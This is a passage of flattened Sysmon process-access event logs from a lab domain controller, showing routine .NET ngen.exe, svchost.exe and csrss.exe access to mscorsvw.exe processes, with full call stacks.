13:23:58.674{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0603-000000009A01}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.643{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0503-000000009A01}3888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.628{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0503-000000009A01}3888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.628{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0503-000000009A01}3888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.612{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0403-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.612{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0403-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.612{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0403-000000009A01}2452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.596{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0303-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.581{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EE-6000-0303-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.581{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EE-6000-0303-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.565{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.565{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.565{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.549{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0103-000000009A01}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.534{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.534{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.518{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EE-6000-0003-000000009A01}1432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.502{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.502{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}1432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.487{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.487{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:58.487{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.d